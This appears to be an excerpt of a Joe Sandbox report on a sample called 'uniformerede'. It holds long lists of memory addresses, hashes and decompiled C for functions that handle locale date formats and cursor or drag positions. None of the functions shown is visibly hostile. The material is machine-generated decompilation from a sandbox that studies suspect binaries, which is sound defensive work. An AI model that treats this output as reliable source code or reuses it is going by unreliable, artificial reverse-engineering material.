                                                                                                                                                                                                                            0x0043bcc2
                                                                                                                                                                                                                            0x0043bcd9
                                                                                                                                                                                                                            0x0043bcd9
                                                                                                                                                                                                                            0x0043bd1c
                                                                                                                                                                                                                            0x0043bd35
                                                                                                                                                                                                                            0x0043bd40
                                                                                                                                                                                                                            0x0043bd41
                                                                                                                                                                                                                            0x0043bd42
                                                                                                                                                                                                                            0x0043bd43
                                                                                                                                                                                                                            0x0043bd4e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043bd56
                                                                                                                                                                                                                            0x0043bd58
                                                                                                                                                                                                                            0x0043bd5d
                                                                                                                                                                                                                            0x0043bd64
                                                                                                                                                                                                                            0x0043bd81
                                                                                                                                                                                                                            0x0043bd81
                                                                                                                                                                                                                            0x0043bd66
                                                                                                                                                                                                                            0x0043bd74
                                                                                                                                                                                                                            0x0043bd79
                                                                                                                                                                                                                            0x0043bd7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043bd7d
                                                                                                                                                                                                                            0x0043bd7d
                                                                                                                                                                                                                            0x0043bd7d
                                                                                                                                                                                                                            0x0043bd7b
                                                                                                                                                                                                                            0x0043bd83
                                                                                                                                                                                                                            0x0043bd86
                                                                                                                                                                                                                            0x0043bd8a
                                                                                                                                                                                                                            0x0043be4e
                                                                                                                                                                                                                            0x0043be57
                                                                                                                                                                                                                            0x0043bd90
                                                                                                                                                                                                                            0x0043bd9e
                                                                                                                                                                                                                            0x0043bda3
                                                                                                                                                                                                                            0x0043bda4
                                                                                                                                                                                                                            0x0043bda9
                                                                                                                                                                                                                            0x0043bdac
                                                                                                                                                                                                                            0x0043bdaf
                                                                                                                                                                                                                            0x0043bdb5
                                                                                                                                                                                                                            0x0043bdb7
                                                                                                                                                                                                                            0x0043bdc2
                                                                                                                                                                                                                            0x0043bdc2
                                                                                                                                                                                                                            0x0043bdb9
                                                                                                                                                                                                                            0x0043bdbe
                                                                                                                                                                                                                            0x0043bdbe
                                                                                                                                                                                                                            0x0043bdc9
                                                                                                                                                                                                                            0x0043bdce
                                                                                                                                                                                                                            0x0043bdd0
                                                                                                                                                                                                                            0x0043bddb
                                                                                                                                                                                                                            0x0043bddb
                                                                                                                                                                                                                            0x0043bde3
                                                                                                                                                                                                                            0x0043bdec
                                                                                                                                                                                                                            0x0043bdf5
                                                                                                                                                                                                                            0x0043be02
                                                                                                                                                                                                                            0x0043be03
                                                                                                                                                                                                                            0x0043be04
                                                                                                                                                                                                                            0x0043be05
                                                                                                                                                                                                                            0x0043be06
                                                                                                                                                                                                                            0x0043be17
                                                                                                                                                                                                                            0x0043be1f
                                                                                                                                                                                                                            0x0043be2c
                                                                                                                                                                                                                            0x0043be31
                                                                                                                                                                                                                            0x0043be33
                                                                                                                                                                                                                            0x0043be36
                                                                                                                                                                                                                            0x0043be39
                                                                                                                                                                                                                            0x0043be46
                                                                                                                                                                                                                            0x0043be46
                                                                                                                                                                                                                            0x0043bd8a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: PointsWindow
                                                                                                                                                                                                                            • String ID: `C
                                                                                                                                                                                                                            • API String ID: 4123100037-1847193361
                                                                                                                                                                                                                            • Opcode ID: edafbefe9214ada682fb394692102233c218be9ebcf8d20e0dd442c83bccb53c
                                                                                                                                                                                                                            • Instruction ID: c5412465f47d1a6e8130c1b59b62e835d5ea1c6a9e2590bbc59edeaf8022136c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: edafbefe9214ada682fb394692102233c218be9ebcf8d20e0dd442c83bccb53c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0514D75E002089FCB11DFA9C882BEEB7B5EF49304F14906AED14AB392C7799D05CB95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CC9C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40ce66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004049C0(__edx);
				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404C80(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x49b134], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404C88(_t122, 0x40cec0);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404BA8();
												E00404C88(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404C88(_t122, 0x40ceb4);
										_t92 = _t92 + 1;
									}
								} else {
									E00404C88(_t122, 0x40cea0);
									_t92 = _t92 + 3;
								}
							} else {
								E00404C88(_t122, 0x40ce8c);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040DD78(_t124, _t92);
							E00404EE0(_t124, _v8, _t92,  &_v20);
							E00404C88(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x49e748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404A14(_t122, _t124);
					} else {
						while(_t92 <= E00404C80(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404BA8();
									E00404C88(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040CE6D);
				return E004049E4( &_v24, 4);
			}























                                                                                                                                                                                                                            0x0040cc9c
                                                                                                                                                                                                                            0x0040cca1
                                                                                                                                                                                                                            0x0040cca2
                                                                                                                                                                                                                            0x0040cca3
                                                                                                                                                                                                                            0x0040cca4
                                                                                                                                                                                                                            0x0040cca5
                                                                                                                                                                                                                            0x0040cca9
                                                                                                                                                                                                                            0x0040ccab
                                                                                                                                                                                                                            0x0040ccaf
                                                                                                                                                                                                                            0x0040ccb0
                                                                                                                                                                                                                            0x0040ccb5
                                                                                                                                                                                                                            0x0040ccb8
                                                                                                                                                                                                                            0x0040ccbb
                                                                                                                                                                                                                            0x0040ccc2
                                                                                                                                                                                                                            0x0040ccda
                                                                                                                                                                                                                            0x0040ccf2
                                                                                                                                                                                                                            0x0040ce3c
                                                                                                                                                                                                                            0x0040ce3e
                                                                                                                                                                                                                            0x0040ce43
                                                                                                                                                                                                                            0x0040ce45
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040cd5b
                                                                                                                                                                                                                            0x0040cd60
                                                                                                                                                                                                                            0x0040cd67
                                                                                                                                                                                                                            0x0040cda5
                                                                                                                                                                                                                            0x0040cdaa
                                                                                                                                                                                                                            0x0040cdac
                                                                                                                                                                                                                            0x0040cdcb
                                                                                                                                                                                                                            0x0040cdd0
                                                                                                                                                                                                                            0x0040cdd2
                                                                                                                                                                                                                            0x0040cdf3
                                                                                                                                                                                                                            0x0040cdf8
                                                                                                                                                                                                                            0x0040cdfa
                                                                                                                                                                                                                            0x0040ce0f
                                                                                                                                                                                                                            0x0040ce0f
                                                                                                                                                                                                                            0x0040ce11
                                                                                                                                                                                                                            0x0040ce17
                                                                                                                                                                                                                            0x0040ce1e
                                                                                                                                                                                                                            0x0040ce13
                                                                                                                                                                                                                            0x0040ce13
                                                                                                                                                                                                                            0x0040ce15
                                                                                                                                                                                                                            0x0040ce2c
                                                                                                                                                                                                                            0x0040ce36
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040ce15
                                                                                                                                                                                                                            0x0040cdfc
                                                                                                                                                                                                                            0x0040ce03
                                                                                                                                                                                                                            0x0040ce08
                                                                                                                                                                                                                            0x0040ce08
                                                                                                                                                                                                                            0x0040cdd4
                                                                                                                                                                                                                            0x0040cddb
                                                                                                                                                                                                                            0x0040cde0
                                                                                                                                                                                                                            0x0040cde0
                                                                                                                                                                                                                            0x0040cdae
                                                                                                                                                                                                                            0x0040cdb5
                                                                                                                                                                                                                            0x0040cdba
                                                                                                                                                                                                                            0x0040cdba
                                                                                                                                                                                                                            0x0040ce3b
                                                                                                                                                                                                                            0x0040ce3b
                                                                                                                                                                                                                            0x0040cd69
                                                                                                                                                                                                                            0x0040cd72
                                                                                                                                                                                                                            0x0040cd80
                                                                                                                                                                                                                            0x0040cd8a
                                                                                                                                                                                                                            0x0040cd8f
                                                                                                                                                                                                                            0x0040cd8f
                                                                                                                                                                                                                            0x0040cd67
                                                                                                                                                                                                                            0x0040ccf8
                                                                                                                                                                                                                            0x0040ccf8
                                                                                                                                                                                                                            0x0040ccfd
                                                                                                                                                                                                                            0x0040cd00
                                                                                                                                                                                                                            0x0040cd0e
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd12
                                                                                                                                                                                                                            0x0040cd4d
                                                                                                                                                                                                                            0x0040cd14
                                                                                                                                                                                                                            0x0040cd39
                                                                                                                                                                                                                            0x0040cd1a
                                                                                                                                                                                                                            0x0040cd1a
                                                                                                                                                                                                                            0x0040cd1c
                                                                                                                                                                                                                            0x0040cd1e
                                                                                                                                                                                                                            0x0040cd20
                                                                                                                                                                                                                            0x0040cd29
                                                                                                                                                                                                                            0x0040cd33
                                                                                                                                                                                                                            0x0040cd33
                                                                                                                                                                                                                            0x0040cd20
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd44
                                                                                                                                                                                                                            0x0040cd12
                                                                                                                                                                                                                            0x0040ce4b
                                                                                                                                                                                                                            0x0040ce4d
                                                                                                                                                                                                                            0x0040ce50
                                                                                                                                                                                                                            0x0040ce53
                                                                                                                                                                                                                            0x0040ce65

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                            • Opcode ID: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                                                                                                                                                                                            • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004392CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x49eb34 = __eax;
				_push(_t133);
				_push(0x439471);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x49eb3c = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E00403DE8(__eax, __eflags);
					__eflags =  *0x49eb34;
					if( *0x49eb34 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00438690(1, _t124);
							 *0x49eb3c = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x437498; // 0x4374e4
						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E004197DC(0,  &_v36, 0, _t124, _t129);
								E0043AA94(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								_t130 = _v12;
								_t125 =  *((intOrPtr*)(_v12 + 0x38));
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x437498; // 0x4374e4
							_t71 = E00403D78(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E00441704(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043915C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E00403DE8(__eax, _t135);
				if( *0x49eb34 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00438578(_t124, 1);
						 *0x49eb3c = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}




























                                                                                                                                                                                                                            0x004392cc
                                                                                                                                                                                                                            0x004392d5
                                                                                                                                                                                                                            0x004392d8
                                                                                                                                                                                                                            0x004392da
                                                                                                                                                                                                                            0x004392dc
                                                                                                                                                                                                                            0x004392e4
                                                                                                                                                                                                                            0x004392e5
                                                                                                                                                                                                                            0x004392ea
                                                                                                                                                                                                                            0x004392ed
                                                                                                                                                                                                                            0x004392f2
                                                                                                                                                                                                                            0x004392f5
                                                                                                                                                                                                                            0x004392fc
                                                                                                                                                                                                                            0x00439303
                                                                                                                                                                                                                            0x00439359
                                                                                                                                                                                                                            0x0043935e
                                                                                                                                                                                                                            0x00439365
                                                                                                                                                                                                                            0x00439374
                                                                                                                                                                                                                            0x00439378
                                                                                                                                                                                                                            0x00439388
                                                                                                                                                                                                                            0x0043938b
                                                                                                                                                                                                                            0x0043938b
                                                                                                                                                                                                                            0x00439395
                                                                                                                                                                                                                            0x0043939a
                                                                                                                                                                                                                            0x004393a0
                                                                                                                                                                                                                            0x004393a5
                                                                                                                                                                                                                            0x004393a7
                                                                                                                                                                                                                            0x004393c5
                                                                                                                                                                                                                            0x004393c8
                                                                                                                                                                                                                            0x004393cc
                                                                                                                                                                                                                            0x004393f9
                                                                                                                                                                                                                            0x004393fe
                                                                                                                                                                                                                            0x00439400
                                                                                                                                                                                                                            0x0043940d
                                                                                                                                                                                                                            0x00439412
                                                                                                                                                                                                                            0x00439418
                                                                                                                                                                                                                            0x0043941e
                                                                                                                                                                                                                            0x00439421
                                                                                                                                                                                                                            0x00439421
                                                                                                                                                                                                                            0x0043942a
                                                                                                                                                                                                                            0x00439433
                                                                                                                                                                                                                            0x00439439
                                                                                                                                                                                                                            0x0043943e
                                                                                                                                                                                                                            0x00439444
                                                                                                                                                                                                                            0x0043944a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043944a
                                                                                                                                                                                                                            0x004393d0
                                                                                                                                                                                                                            0x004393d6
                                                                                                                                                                                                                            0x004393db
                                                                                                                                                                                                                            0x004393dd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004393e3
                                                                                                                                                                                                                            0x004393e8
                                                                                                                                                                                                                            0x004393ee
                                                                                                                                                                                                                            0x004393f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004393a9
                                                                                                                                                                                                                            0x004393b8
                                                                                                                                                                                                                            0x0043944d
                                                                                                                                                                                                                            0x00439456
                                                                                                                                                                                                                            0x00439457
                                                                                                                                                                                                                            0x00439458
                                                                                                                                                                                                                            0x00439459
                                                                                                                                                                                                                            0x0043945a
                                                                                                                                                                                                                            0x00439462
                                                                                                                                                                                                                            0x00439469
                                                                                                                                                                                                                            0x0043946c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043946c
                                                                                                                                                                                                                            0x004393a7
                                                                                                                                                                                                                            0x00439369
                                                                                                                                                                                                                            0x0043936c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043936c
                                                                                                                                                                                                                            0x0043930e
                                                                                                                                                                                                                            0x0043931a
                                                                                                                                                                                                                            0x00439329
                                                                                                                                                                                                                            0x0043932d
                                                                                                                                                                                                                            0x00439341
                                                                                                                                                                                                                            0x00439344
                                                                                                                                                                                                                            0x00439344
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043932d
                                                                                                                                                                                                                            0x0043931e
                                                                                                                                                                                                                            0x00439321
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: \`C$tC
                                                                                                                                                                                                                            • API String ID: 0-3452953066
                                                                                                                                                                                                                            • Opcode ID: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                                                                                                                                                                                            • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x49eb38 = __eax;
				_t24 =  *0x49eb38; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x49eb44);
				_t26 =  *0x49eb38; // 0x0
				_t58 = 0x49eb44->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x49eb48; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x49eb4c = GetCursor();
				_t28 =  *0x49eb38; // 0x0
				 *0x49eb40 = E00438388(_t28);
				 *0x49eb50 = _t70;
				_t60 =  *0x4360a0; // 0x4360ec
				if(E00403D78(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x49eb38; // 0x0
				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x49eb58;
				if( *0x49eb58 != 0) {
					_t37 =  *0x49eb48; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x49eb58; // 0x0
					E00443038(_t39, _t38, _t85, _t37);
				}
				_t35 = E00403BBC(1);
				 *0x49eb60 = _t35;
				if( *0x49eb54 != 0) {
					_t35 = E00438E8C(0x49eb44, 1);
				}
				return _t35;
			}


























                                                                                                                                                                                                                            0x0043915c
                                                                                                                                                                                                                            0x0043915f
                                                                                                                                                                                                                            0x00439162
                                                                                                                                                                                                                            0x00439164
                                                                                                                                                                                                                            0x00439166
                                                                                                                                                                                                                            0x00439168
                                                                                                                                                                                                                            0x0043916e
                                                                                                                                                                                                                            0x00439175
                                                                                                                                                                                                                            0x0043917d
                                                                                                                                                                                                                            0x00439182
                                                                                                                                                                                                                            0x00439187
                                                                                                                                                                                                                            0x0043918d
                                                                                                                                                                                                                            0x00439190
                                                                                                                                                                                                                            0x00439196
                                                                                                                                                                                                                            0x0043919e
                                                                                                                                                                                                                            0x004391a3
                                                                                                                                                                                                                            0x004391ad
                                                                                                                                                                                                                            0x004391b2
                                                                                                                                                                                                                            0x004391ba
                                                                                                                                                                                                                            0x004391c7
                                                                                                                                                                                                                            0x00439259
                                                                                                                                                                                                                            0x0043925b
                                                                                                                                                                                                                            0x00439266
                                                                                                                                                                                                                            0x0043925d
                                                                                                                                                                                                                            0x0043925d
                                                                                                                                                                                                                            0x0043925d
                                                                                                                                                                                                                            0x004391cd
                                                                                                                                                                                                                            0x004391cd
                                                                                                                                                                                                                            0x004391cf
                                                                                                                                                                                                                            0x004391cf
                                                                                                                                                                                                                            0x004391d5
                                                                                                                                                                                                                            0x004391db
                                                                                                                                                                                                                            0x004391fd
                                                                                                                                                                                                                            0x004391ff
                                                                                                                                                                                                                            0x00439202
                                                                                                                                                                                                                            0x004391dd
                                                                                                                                                                                                                            0x004391e2
                                                                                                                                                                                                                            0x004391e5
                                                                                                                                                                                                                            0x004391ed
                                                                                                                                                                                                                            0x004391f1
                                                                                                                                                                                                                            0x004391f5
                                                                                                                                                                                                                            0x004391f7
                                                                                                                                                                                                                            0x004391fa
                                                                                                                                                                                                                            0x004391fa
                                                                                                                                                                                                                            0x00439208
                                                                                                                                                                                                                            0x0043920f
                                                                                                                                                                                                                            0x00439234
                                                                                                                                                                                                                            0x00439236
                                                                                                                                                                                                                            0x00439239
                                                                                                                                                                                                                            0x00439211
                                                                                                                                                                                                                            0x00439211
                                                                                                                                                                                                                            0x00439218
                                                                                                                                                                                                                            0x0043921b
                                                                                                                                                                                                                            0x00439224
                                                                                                                                                                                                                            0x00439228
                                                                                                                                                                                                                            0x0043922c
                                                                                                                                                                                                                            0x0043922e
                                                                                                                                                                                                                            0x00439231
                                                                                                                                                                                                                            0x00439231
                                                                                                                                                                                                                            0x0043923e
                                                                                                                                                                                                                            0x00439250
                                                                                                                                                                                                                            0x00439240
                                                                                                                                                                                                                            0x00439240
